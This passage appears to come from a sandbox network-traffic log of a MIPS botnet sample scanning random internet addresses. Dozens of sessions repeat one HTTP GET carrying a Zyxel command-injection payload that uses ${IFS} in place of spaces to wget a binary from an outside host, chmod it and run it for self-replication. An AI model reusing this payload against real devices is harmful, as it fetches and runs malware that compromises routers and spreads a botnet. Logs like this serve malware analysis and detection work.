                                                Jan 12, 2024 18:24:20.473273993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                581192.168.2.1344648114.18.157.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473308086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                582192.168.2.1340726205.231.65.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473356962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                583192.168.2.135641888.228.243.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473395109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                584192.168.2.133567291.146.219.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473426104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                585192.168.2.134783261.243.253.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473470926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                586192.168.2.1345066210.108.241.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473529100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                587192.168.2.1343184155.203.178.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473537922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                588192.168.2.1350710200.189.83.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473582029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                589192.168.2.1340952180.109.90.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473640919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                590192.168.2.1359396100.171.11.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473683119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                591192.168.2.134587631.83.69.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473711014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                592192.168.2.135963895.167.189.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473758936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                593192.168.2.1343586177.16.23.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473782063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                594192.168.2.1333148163.153.234.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473823071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                595192.168.2.1334278154.117.221.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473838091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                596192.168.2.1349106206.206.184.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473877907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                597192.168.2.1334402221.34.20.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473903894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                598192.168.2.1350992160.191.175.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473936081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                599192.168.2.134009693.224.19.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473973989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                600192.168.2.133865635.232.169.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474037886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                601192.168.2.1360568141.156.118.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474072933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                602192.168.2.1335364216.93.132.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474086046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                603192.168.2.1359106103.38.153.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474134922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                604192.168.2.1338718123.57.130.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474163055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                605192.168.2.1334464194.216.100.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474209070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                606192.168.2.134277420.147.106.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474256992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                607192.168.2.1354868156.246.149.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474262953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                608192.168.2.1335544208.216.1.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474330902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                609192.168.2.1337334182.94.137.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474400997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                610192.168.2.1353992175.136.153.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474405050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                611192.168.2.1351710184.85.252.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474442959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                612192.168.2.1360340170.56.239.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474478960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                613192.168.2.1340204212.148.61.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474524975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                614192.168.2.1339538133.120.242.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474570990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                615192.168.2.1347686171.225.39.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474616051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                616192.168.2.1334448124.161.237.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474644899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                617192.168.2.1350284197.177.157.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474675894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                618192.168.2.133914458.111.39.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474728107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                619192.168.2.1347196151.155.54.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474764109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                620192.168.2.134553627.27.4.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474793911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                621192.168.2.133500431.111.182.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474828959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                622192.168.2.1339564159.151.5.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474898100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                623192.168.2.1343936184.123.216.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474929094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                624192.168.2.13542501.94.196.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.474960089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                625192.168.2.1335242116.100.195.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475018024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                626192.168.2.134765870.127.204.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475028992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                627192.168.2.13475764.196.225.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475073099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                628192.168.2.1338904118.255.93.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475116968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                629192.168.2.133553695.25.146.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475147963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                630192.168.2.135344673.77.126.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475195885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                631192.168.2.134216274.98.13.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475227118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                632192.168.2.134190619.207.251.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475249052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                633192.168.2.1359892223.199.96.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475287914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                634192.168.2.133493844.212.198.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475334883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                635192.168.2.1350302206.151.57.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475383997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                636192.168.2.1338758168.15.86.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475430012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                637192.168.2.134639642.194.62.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475469112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                638192.168.2.135019472.131.180.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475501060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                639192.168.2.1346066151.167.133.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475558043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                640192.168.2.133321018.206.171.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475590944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                641192.168.2.134821072.230.248.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475639105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                642192.168.2.1354468179.157.151.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475671053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                643192.168.2.1336194217.4.81.36443
                                                TimestampBytes transferredDirectionData
